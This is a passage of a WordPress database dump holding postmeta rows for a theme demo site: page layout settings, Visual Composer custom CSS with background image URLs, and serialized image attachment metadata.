!important;}.vc_custom_1406710078643{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(928,815,'slide_template','default'),(929,815,'page_layout','fullwidth'),(930,815,'page_sidebar','Default Sidebar'),(931,815,'gallery_type','lightbox'),(932,815,'gallery_images',''),(933,815,'video_site_url',''),(934,815,'page_width','content'),(935,815,'navbar_style','default'),(936,815,'navbar_color','default'),(937,815,'footer_color','default'),(938,815,'page_header','default'),(939,815,'page_subtitle','But I must explain to you how all this mistaken idea of denouncing.'),(942,844,'_thumbnail_id','555'),(943,844,'slide_template','default'),(944,844,'page_layout','sidebar_right'),(945,844,'page_sidebar','Default Sidebar'),(946,844,'gallery_images',''),(947,844,'video_site_url',''),(948,844,'page_width','content'),(949,844,'navbar_style','default'),(950,844,'navbar_color','default'),(951,844,'footer_color','default'),(952,844,'page_header','default'),(953,844,'page_subtitle','Standard post tagline'),(954,985,'_wp_page_template','template-onepager.php'),(955,985,'_wpb_shortcodes_custom_css','.vc_custom_1410556411627{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}.vc_custom_1405099060231{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i1.jpg?id=536) !important;}.vc_custom_1405492003813{border-top-width: 1px !important;padding-bottom: 10px !important;border-color: #eeeeee !important;border-style: solid !important;}.vc_custom_1405099363182{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i2.jpg?id=537) !important;}.vc_custom_1406709787994{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1410557528085{padding-top: 0px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1404037588724{padding-bottom: 70px !important;}.vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}.vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409759263341{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i3.jpg?id=538) !important;}.vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099917341{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i4.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709770765{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709776984{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(956,985,'_wpb_vc_js_status','true'),(957,985,'_wpb_vc_js_interface_version','2'),(958,985,'slide_template','default'),(959,985,'theme_skin','default'),(960,985,'theme_tone','dark'),(961,985,'loader','default'),(962,985,'page_layout','fullwidth'),(963,985,'page_sidebar','Default Sidebar'),(964,985,'page_width','fullwidth'),(965,985,'navbar_style','style3'),(966,985,'navbar_color','default'),(967,985,'footer_color','default'),(968,985,'page_header','no-header'),(969,985,'page_subtitle',''),(970,985,'title',''),(971,985,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(973,1916,'_wp_page_template','template-onepager.php'),(974,1916,'_wpb_shortcodes_custom_css','.vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}.vc_custom_1405099060231{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}.vc_custom_1405492003813{border-top-width: 1px !important;padding-bottom: 10px !important;border-color: #eeeeee !important;border-style: solid !important;}.vc_custom_1405099363182{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}.vc_custom_1406709787994{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1408506097407{padding-top: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1404037588724{padding-bottom: 70px !important;}.vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}.vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409759263341{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}.vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099917341{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709770765{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709776984{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(975,1916,'slide_template','default'),(976,1916,'page_layout','fullwidth'),(977,1916,'page_sidebar','Default Sidebar'),(978,1916,'page_width','fullwidth'),(979,1916,'navbar_style','style2'),(980,1916,'navbar_color','dark'),(981,1916,'footer_color','default'),(982,1916,'page_header','no-header'),(983,1916,'page_subtitle',''),(984,1916,'title',''),(985,1916,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(986,1916,'_wpb_vc_js_interface_version','2'),(987,1916,'_wpb_vc_js_status','true'),(991,265,'quote_author',''),(992,265,'page_type','default'),(993,265,'page_header','default'),(994,265,'_thumbnail_id','556'),(995,265,'footer_color','default'),(996,265,'navbar_color','default'),(997,265,'navbar_style','default'),(998,265,'page_subtitle','But I must explain to you how all this mistaken idea of denouncing'),(999,265,'page_width','content'),(1000,265,'slide_template','default'),(1001,265,'page_layout','sidebar_right'),(1002,265,'page_sidebar','Default Sidebar'),(1003,265,'thumb_setting','on'),(1004,265,'thumb_height','landscape'),(1005,265,'thumb_lightbox','off'),(1006,265,'gallery_type','lightbox'),(1007,265,'post_link',''),(1008,265,'gallery_images',''),(1009,265,'video_site_url',''),(1010,265,'audio_url',''),(1011,265,'quote_content',''),(1034,753,'_edit_lock','1603893047:1'),(1014,274,'page_subtitle','But I must explain to you how all this mistaken idea of denouncing'),(1015,274,'footer_color','default'),(1016,274,'navbar_color','default'),(1017,274,'navbar_style','default'),(1018,274,'_thumbnail_id','267'),(1019,274,'page_layout','sidebar_right'),(1020,274,'page_sidebar','Default Sidebar'),(1021,274,'thumb_setting','on'),(1022,274,'thumb_height','landscape'),(1023,274,'thumb_lightbox','off'),(1024,274,'gallery_type','slider'),(1025,274,'gallery_images','554,555'),(1026,274,'video_site_url',''),(1027,274,'page_type','default'),(1028,274,'page_header','default'),(1029,274,'post_views_count','3'),(1030,274,'slide_template',''),(1031,274,'page_width','content'),(1036,1933,'_wp_attached_file','2020/10/log_file_2020-10-28__13-53-32.txt'),(1037,1934,'_wp_attached_file','2014/07/012-1.jpg'),(1038,1934,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1150;s:6:\"height\";i:800;s:4:\"file\";s:17:\"2014/07/012-1.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"012-1-300x209.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:209;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"012-1-1024x712.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:712;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"012-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"012-1-768x534.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"012-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:18:\"012-1-1150x500.jpg\";s:5:\"width\";i:1150;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"012-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:17:\"012-1-880x612.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:612;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"012-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"012-1-450x313.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:313;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"012-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1039,1935,'_wp_attached_file','2014/07/022-1.jpg'),(1040,1935,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:517;s:6:\"height\";i:536;s:4:\"file\";s:17:\"2014/07/022-1.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"022-1-289x300.jpg\";s:5:\"width\";i:289;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"022-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"022-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:17:\"022-1-517x500.jpg\";s:5:\"width\";i:517;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"022-1-517x380.jpg\";s:5:\"width\";i:517;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"022-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"022-1-450x467.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:467;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"022-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1041,1936,'_wp_attached_file','2014/07/032-1.jpg'),(1042,1936,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:672;s:4:\"file\";s:17:\"2014/07/032-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"032-1-300x224.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"032-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"032-1-768x573.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:573;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"032-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:17:\"032-1-900x500.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"032-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:17:\"032-1-880x657.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:657;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"032-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"032-1-450x336.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:336;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"032-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1043,1937,'_wp_attached_file','2014/07/042-1.jpg'),(1044,1937,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:660;s:4:\"file\";s:17:\"2014/07/042-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"042-1-300x220.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"042-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"042-1-768x563.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:563;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"042-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:17:\"042-1-900x500.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"042-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:17:\"042-1-880x645.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:645;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"042-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"042-1-450x330.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:330;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"042-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1045,1938,'_wp_attached_file','2014/07/051-1.jpg'),(1046,1938,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:675;s:4:\"file\";s:17:\"2014/07/051-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"051-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"051-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"051-1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"051-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:17:\"051-1-900x500.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"051-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:17:\"051-1-880x660.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"051-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"051-1-450x338.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"051-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1047,1939,'_wp_attached_file','2014/07/061-1.jpg'),(1048,1939,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:630;s:6:\"height\";i:441;s:4:\"file\";s:17:\"2014/07/061-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"061-1-300x210.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:210;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"061-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"061-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"061-1-630x380.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"061-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"061-1-450x315.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:315;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"061-1-450x441.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:441;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1049,1940,'_wp_attached_file','2014/07/071-1.jpg'),(1050,1940,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:545;s:4:\"file\";s:17:\"2014/07/071-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"071-1-300x182.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"071-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"071-1-768x465.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:465;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"071-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:17:\"071-1-900x500.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"071-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:17:\"071-1-880x533.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"071-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"071-1-450x273.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:273;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"071-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1051,1941,'_wp_attached_file','2014/07/081-1.jpg'),(1052,1941,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:610;s:4:\"file\";s:17:\"2014/07/081-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"081-1-300x203.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"081-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"081-1-768x521.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:521;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"081-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:17:\"081-1-900x500.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"081-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:17:\"081-1-880x596.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:596;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"081-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"081-1-450x305.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:305;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"081-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1053,1942,'_wp_attached_file','2014/07/091-1.jpg'),(1054,1942,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:800;s:4:\"file\";s:17:\"2014/07/091-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"091-1-300x234.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:234;s:9:\"